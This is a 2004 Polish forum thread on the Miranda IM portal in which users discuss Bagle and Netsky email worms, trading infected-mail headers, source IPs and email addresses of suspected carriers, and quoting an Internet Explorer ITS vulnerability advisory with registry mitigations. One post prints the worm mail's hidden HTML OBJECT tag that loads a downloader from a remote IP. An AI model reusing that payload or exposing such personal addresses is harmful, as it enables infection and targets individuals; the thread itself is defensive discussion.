Ta strona wykorzystuje technologię cookies, zapoznaj się z naszą Polityką prywatności.
Oficjalny Polski Portal Komunikatora Miranda
Strona główna   O Mirandzie   FAQ   Download   English   TeamPL   Profil   Zaloguj   Rejestracja  
Wyszukaj interesujące Cię dyskusje Wyszukaj interesujące Cię dyskusje Szybkie szukanie:     
 REGULAMIN    O nas...   * Zaloguj się, by sprawdzić wiadomości   * Użytkownicy   * Grupy   * phpBB forum FAQ

[ALERT] Wirusy pocztowe
Idź do strony Poprzedni  1, 2
 
Napisz nowy temat   Odpowiedz do tematu    Forum www.miranda-im.pl Strona Główna -> Ogłoszenia
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
DJ Lotos Płeć: mężczyzna
Root Admin
Root Admin



Dołączył: 19 Sty 2003
Posty: 3342
Skąd: PL/state: lubuskie
Wiek: 46 lat(a)

PostWysłany: 11 Mar 2004 13:38    Temat postu: Odpowiedz z cytatem

moon napisał:
Chwileczke... chwileczke...

DJ: Jakie jest IP z ktorego przychodza te wirusy? Wklej naglowek tego maila. Pozniej moze dojdziesz ktory z userow tego forum jest zawiruszony. Przeciez IP przy wyslanych postach sie zapisuja[...]

Łatwo powiedziec... gorzej jak zainfekowana osoba nie napisala ani jednego posta na tym forum Wink

A takich jest cala masa wiec gorzej bedzie namierzyc bo trzeba by trzepac baze i szukac w logach... a jesli to byl gosc to tym bardziej do niego nie dotrzesz zeby mu powiedziec nie majac maila tylko gołe IP a kopie html-i na jego HDD w TMP dalej beda slużyly jako lista mailingowa dla wirusa Wink

Aktualnie jednego schwytalem i jest z: siec.sulechow.net, 195.116.20.198

Ale co z tego jak w tej sieci moze siedziec z kilkaset osob ('przy dobrym wietrze' Wink) za routerem Very Happy

heya
_________________
Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... Wink A. Einstein

Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
Adv Bot




Dołączył: 01 Sty 1970
Posty:

PostWysłany: 28 Mar 2024 15:14    Temat postu: Reklama Odpowiedz z cytatem


TechnoVolt oferuje energooszczędne oświetlenie hal i pomieszczeń magazynowo-produkcyjnych w profesjonalnym wykonaniu.
Wieloletnie doświadczenie i atrakcyjne ceny gwarantują u nas najlepszą ofertę na rynku w branży elektrycznej.
Stosujemy najnowocześniejsze technologie i wysokiej jakości produkty.
Dla inwestycji naszych klientów dostarczamy i wykonujemy nowoczesne oświetlenie energooszczędne (LED) z zastosowaniem opraw: dekoracyjnych, rastrowych, hermetycznych, przemysłowych, projektorów oraz linii świetlnych.
Kontakt z nami i informacje na naszej stronie www.TechnoVolt.pl


*** NOWOŚĆ ***
Kompensacja mocy biernej - obniż swoje rachunki za prąd!
Usługa dostępna na terenie całego kraju

Zredukuj opłaty za prąd :: Płać mniej za prąd

Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
moon Płeć: mężczyzna
VIP
VIP



Dołączył: 07 Mar 2003
Posty: 926
Skąd: Warszawa

PostWysłany: 11 Mar 2004 13:52    Temat postu: Odpowiedz z cytatem

Zadnego IP z sieci lokalnej?

mozesz forwardowac naglowek z tego zawirusowanego maila do tej firmy:
KABEL-SAT Spółka z o. o.
Os. Konstytucji 3 Maja 2/1
66-100 Sulechów
tel. (068) 3855581
tel. kom. 0609682726 email: kabel-sat@sulechow.net

Moze powiadomiom tego osiolka... Ja kiedys jednego z AGH ta metoda uciszylem...
_________________
I feel like the Blind Man, in a Dark Room,
looking for the Black Cat - That is Not There


Przeczytaj http://rtfm.bsdzine.org zanim zadasz pytanie!
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość Odwiedź stronę autora
DJ Lotos Płeć: mężczyzna
Root Admin
Root Admin



Dołączył: 19 Sty 2003
Posty: 3342
Skąd: PL/state: lubuskie
Wiek: 46 lat(a)

PostWysłany: 11 Mar 2004 15:00    Temat postu: Odpowiedz z cytatem

oj chyba bym sie nalatal jak glupi Wink

kolejny z: ip52.t3.ds.pwr.wroc.pl, 156.17.225.52

szukanie igły w stogu siana jednym slowem Wink
_________________
Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... Wink A. Einstein

Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
moon Płeć: mężczyzna
VIP
VIP



Dołączył: 07 Mar 2003
Posty: 926
Skąd: Warszawa

PostWysłany: 11 Mar 2004 15:44    Temat postu: Odpowiedz z cytatem

No niestety... To walka z wiatrakami...
_________________
I feel like the Blind Man, in a Dark Room,
looking for the Black Cat - That is Not There


Przeczytaj http://rtfm.bsdzine.org zanim zadasz pytanie!
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość Odwiedź stronę autora
hiisi Płeć: mężczyzna
Kataryna
Kataryna

Status stażu



Dołączył: 09 Sty 2004
Posty: 115
Skąd: Kraków
Wiek: 44 lat(a)

PostWysłany: 12 Mar 2004 21:48    Temat postu: Odpowiedz z cytatem

Cytat:
Return-Path: <djlotos_xx@wp.peel>
Received: from mx.go2.pl (mx.go2.pl [212.126.20.5]) by box3.go2.pl SERVER; Fri, 12 Mar 2004 17:49:33 +0100
X-mf: first3.pl v0.6
Received: by mx.go2.pl (Postfix) id 2DBB91338AC; Fri, 12 Mar 2004 17:49:25 +0100 (CET)
Delivered-To: hiisi_cv@o2.peel
Received: from Kujawa Milosz (pd212.lomza.sdi.tpnet.pl [213.77.177.212]) by mx.go2.pl (Postfix) with SMTP id 166741339CA for <hiisi@o2.peel>; Fri, 12 Mar 2004 17:49:19 +0100 (CET)
Date: Fri, 12 Mar 2004 17:49:14 +0100
To: hiisi_nn@o2.pl
Subject: ello! =))
From: djlotos_xx@wp.peel
Message-ID: <qnaxnfjbuwwfgmfadgv@wp.peel>
MIME-Version: 1.0
Content-Type: multipart/mixed;

boundary="--------dydtqlwelqidknooydqe"

I don't bite, weah!

..btw, "70246" is a password for archive

DjLotos o to chodzilo?Smile Mowisz masz...oczywiscie zalacznik celowo otworzylem, zawieral Worm.Bagle H...
ale rozpoznany przez antywira zostal:)


Ostatnio zmieniony przez hiisi dnia 13 Mar 2004 4:05, w całości zmieniany 1 raz
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
DJ Lotos Płeć: mężczyzna
Root Admin
Root Admin



Dołączył: 19 Sty 2003
Posty: 3342
Skąd: PL/state: lubuskie
Wiek: 46 lat(a)

PostWysłany: 12 Mar 2004 22:40    Temat postu: Odpowiedz z cytatem

tak, o to chodzilo, w sumie o to co pogrubilem w tym co zacytowałeś Wink

adresów mailowych raczej nie podawaj w postach, zmniejszysz ryzyko pobrania ich z html-i przez wirusy i ponownego ataku
_________________
Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... Wink A. Einstein

Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
mina86 Płeć: mężczyzna
Weteran
Weteran



Dołączył: 18 Sty 2003
Posty: 686
Skąd: Linux 2.6.x x86_64
Wiek: 38 lat(a)

PostWysłany: 13 Mar 2004 11:35    Temat postu: Odpowiedz z cytatem

Nosicieli może być kilkuset zacznijmy od tego... Poza tym nie koniecznie wirusy muszą ciągnąć adresy email z tego forum.. Mogą ciągnąć je z jakichś innych stron.. Osobiście dostaje około 20-30 takich mailii dziennie i stweirdziłem, że nie ma sensu się w nic bawić z tym...
_________________
Post wygenerowany automatycznie przez system sztucznej inteligencji o kodowej nazwie mina86
Myślałem, że jest wolność słowa...
i wtedy właśnie kazali mi usunąć adres strony z tej stopki.
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość Odwiedź stronę autora
Bags_Bunny Płeć: mężczyzna
VIP
VIP



Dołączył: 02 Lut 2003
Posty: 365
Skąd: Poznań

PostWysłany: 17 Mar 2004 20:48    Temat postu: Odpowiedz z cytatem

teraz w ogole zajebioza.... jeden znajomy dostal maila z adresu xxx@jabberpl.org Laughing Laughing
--edit--
jeszcze cos... ofiara jak i posiadacz tego jid'a wypowiadaja sie na tym samym forum (rowniez phpbb)
_________________
php ma w zasadzie tylko jedna zalete - dziala | fatal error: ms windows system found
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
kopar
Gaduła
Gaduła

Status stażu



Dołączył: 06 Sty 2004
Posty: 51
Skąd: Kętrzyn/Warszawa

PostWysłany: 19 Mar 2004 1:34    Temat postu: aloha wirusiarze Odpowiedz z cytatem

proponuję wejść na stronę symantec 'ai poczytać sobie w jaki sposób te gówniane Beagle itp. zdobywają maile, ja z forum nie dostaję ale za to od znajomych moich znajomych itd. ale w YAMNIe wywalam je od razu na serwerze... Razz
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
DJ Lotos Płeć: mężczyzna
Root Admin
Root Admin



Dołączył: 19 Sty 2003
Posty: 3342
Skąd: PL/state: lubuskie
Wiek: 46 lat(a)

PostWysłany: 19 Mar 2004 16:03    Temat postu: Odpowiedz z cytatem

Nie wiem jak u innych ale u mnie w tym calym stosie kilkudziesieciu zawirusowanych maili dziennie przez Netsky.C i D zaczely wyrastac nieco inne kwiatki Wink

W temacie maja zazwyczaj Encrypted document jednak nie zawieraja zadnego załącznika i na pierwszy rzut oka nawet nie zawierają treści Wink

Treścia maila jest krótka wstawka HTML zawierająca przekierowanie na dokument PHP, ktory to z kolei generuje prezentacje Flash Acid (na szczescie cale to zasr... ActiveX mam totalnie wylaczone w przegladarce Wink) jednak podczas przegladania moze sie pojawic oprocz infa alertu zabezpieczen okienko konsolowe niczym Pascalowski output window w wersji na Windy (TPW)

Tresc wyglada tak
Kod:
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://68.190.193.38:81/915353.php">
</OBJECT></body></html>

nie wiem czy jeszcze nie dostalem z innego IP, trzeba bedzie wyhaczyc, dlugo nie trzeba bedzie czekac, próbka już poszla do MkS Wink

#EDIT
Smile no i juz mam odpowiedź
MkS napisał:
To efekt dzialania gdzies w internecie robaka klasy Beagle, list jest
"sciagaczem" wirusa VBS.Zeroline, od dawna juz wykrywanego przez mks-vir'a.
Jednak sama konstrukcja sluzaca do sciagania wirusa jest calkowicie legalna,
mimo tego mks_vir bedzie ja wykrywal od dziesiejszej wersji.

Szybka reakcja i upgrade Wink

Wiecej o tym:
Arrow http://mks.com.pl/baza.html?show=description&id=2696
Arrow http://mks.com.pl/baza.html?show=description&id=2698
Arrow http://mks.com.pl/baza.html?show=description&id=2699

#EDIT2
Jak zauwazylem to adresem mailowym, z ktorego regularnie dostaje wirusy, czyli miedzy innymi losowymi nadawcami ten wystepuje regularnie za kazdym razem i z niego dostaje najczesciej, jest jakby jednym ze wspolnych mianownikow, ktory moze byc adresem faktycznego nosiciela

Jest nim osoba posiadajaca mail jurek(at)tlen.pl, IP zrodla wysylanej wiadomosci: ft130.internetdsl.tpnet.pl, 80.53.45.130

Jesli jest to mail, ktoregos z forumowiczow to prosze o przeskanowanie swojego systemu programem antywirusowym z najnowsza bazą poniewaz bardzo prawdopodobne jest, ze posiada w swoim systemie aktywne kopie przynajmniej kilku róznych wirusów

Inny IP (jeden z wielu), ktory posługuje sie moim adresem email i wysyla wirusy do przypadkowych odbiorcow to: fotosypniewski.konin.pl (c13-61.icpnet.pl), 62.21.13.61

Najciekawsza sprawa jest, ze wirusy majac wlasne silniki SMTP prawdopodobnie podszywają sie pod OE6
Cytat:
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

Pozdr
_________________
Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... Wink A. Einstein

Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
GhostRider Płeć: mężczyzna
Gaduła
Gaduła

Status stażu



Dołączył: 11 Kwi 2004
Posty: 30
Skąd: Poland

PostWysłany: 11 Kwi 2004 18:44    Temat postu: Hehe Odpowiedz z cytatem

A phpbb jest dziurwe jak sito! Koniec opowiści 8)
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość Odwiedź stronę autora
DJ Lotos Płeć: mężczyzna
Root Admin
Root Admin



Dołączył: 19 Sty 2003
Posty: 3342
Skąd: PL/state: lubuskie
Wiek: 46 lat(a)

PostWysłany: 12 Kwi 2004 12:01    Temat postu: Odpowiedz z cytatem

no tak, co fakt troche je polatalem Wink

IE tez jest dziurawe z tym, ze za swoje produkty M$ kaze sobie placic i to nie malo a phpBB jest za free wiec nie ma co sie zbytnio krzywic

krzywic to sie mozna na IE jak sie przeczyta o kolejnej dziurze
FrazPC napisał:
Nowa, już wykorzystywana luka w Internet Explorer!

Luka występuje w implementacji protokołu ITS używanego m.in. do wyświetlania skompilowanych plików pomocy chm. Zagrożeni są użytkownicy Internet Eksplorera we wszystkich systemach Windows. UWAGA! Nie istnieje jeszcze łata na tę lukę, więc pomóc może tylko zmiana niektórych ustawień systemowych.

Możliwe jest wykorzystanie tej luki do uruchomienia dowolnego pliku z prawami użytkownika lokalnego. Można to zrobić zarówno za pomocą odpowiednio spreparowanego maila, jak również na stronie www. Lukę tę wykorzystują już nowe odmiany wirusów i trojanów.

Pełne zabezpieczenie się przed wykorzystaniem tej luki nie jest jeszcze możliwe. Można jedynie ograniczyć jej implikacje przez wyłączenie protokołu ITS. Mogą jednak, wówczas, przestać działać niektóre pliki pomocy i narażone może być, w znacznym stopniu funkcjonowanie systemu. Najlepszą ochroną będzie więc, przykładanie jak największej uwagi przy otwieraniu plików i uważne śledzenie skąd przychodzą adresowane do nas maile.

Ustawienia, które można zmienić, aby zmniejszyć ryzyko infekcji:

zmiana nazwy lub usunięcie następującego klucza w rejestrze:

HKEY_LOCAL_MACHINESOFTWAREClassesPROTOCOLSHandler{ms-its,ms-itss,its,mk}

UWAGA! Najlepiej skopiować sobie ten klucz do pliku (eksport), aby po opublikowaniu przez producenta łaty móc go przywrócić.

inne działania które mogą zmniejszyć ryzyko wykorzystania dziury:

wyłączenie skryptów i kontrolek ActiveX we wszystkich strefach - zarowno Internetowej jak i lokalnej

nie uruchamianie nieznanych linków - zarówno znalezionych w Internecie, jak i otrzymanych pocztą (to zalecenie powtarzamy od dawna i nadal jest bardzo aktualne)

jak najczęstsze uaktualnianie bazy programów antywirusowych - mogą one uchronić nas przed wirusami wykorzystującymi tę lukę, ale nie przed bezpośrednim użyciem np. na spreparowanej stronie!
-------------------------------------------------------------------
Źródło -> http://www.mks.com.pl/baza.html?show=description&id=2736

_________________
Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... Wink A. Einstein

Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
leon_master Płeć: mężczyzna
Weteran
Weteran



Dołączył: 28 Sty 2004
Posty: 705
Skąd: Gliwice
Wiek: 36 lat(a)

PostWysłany: 16 Maj 2004 15:33    Temat postu: Odpowiedz z cytatem

a mnie taki gnojek napieprza od miesiaca. na tydzien ze 3 razy beagle.
Nagłówek napisał:

X-POP3-Rcpt: lperczak@dns
Return-Path: <michu.michal@interia.pl>
Received: from assa-ynb7318pr6.com (nat2.dami-rz.pl [80.48.176.2])
by dns.sensor.com.pl (8.12.11/8.12.11) with SMTP id i4EA8fK3011281
for <--------@multivision.com.pl>; Fri, 14 May 2004 12:08:56 +0200
Date: Fri, 14 May 2004 12:08:31 +0100
To: "Lech.perczak" <----------------@multivision.com.pl>
From: "Michu.michal" <michu.michal@interia.pl>
Subject: New changes
Message-ID: <ybxukkaoijlqddyqnms@multivision.com.pl>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--------hofvuoiqffoypsbttuhn"
X-Virus-Scanned: by AMaViS - amavis-milter (http://www.amavis.org/)
X-Spam-Status: No, hits=-1.0 required=5.0 tests=AWL,BAYES_20,HTML_50_60,
HTML_IMAGE_ONLY_02,HTML_MESSAGE,MIME_HTML_ONLY autolearn=no
version=2.61
X-Spam-Checker-Version: SpamAssassin 2.61 (1.212.2.1-2003-12-09-exp) on
dns.sensor.com.pl


czyli ip 80.48.176.2
traceroute sie urywa w okolicach 11 przeskoku ode mnie.
to moze ciagnac nie wiadomo skad.
aha jak goscia powiadomilem to mnie zbluzgal. jakby sie tu znalazl na forum to mnie powiadomic. raz tez mialem przypadek ze mail rzekomo ode mnie nie doszedl do ambasady jakiejstam chyba w Grecji kraju bo byl zalacznik EXE. po naglowkach zauwazylem ze jakis amerykaniec. powiadomienie wyslal mi mailer-demon tejze ambasady.
Powrót do góry
Zobacz profil autora Wyślij prywatną wiadomość
Wyświetl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum www.miranda-im.pl Strona Główna -> Ogłoszenia Wszystkie czasy w strefie EET (Europa)
Idź do strony Poprzedni  1, 2
Strona 2 z 2

 
Skocz do:  
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach




Newsy z PortaluCo nowego na forumOpis funkcji



:: Kontakt z obsługą  :: Stats  :: Reklama
 
Powered by phpBB © 2001, 2002 phpBB Group, Portal and phpBB extensions © 2003-2007 DJ Lotos, smartBlue Style © 2002 Smartor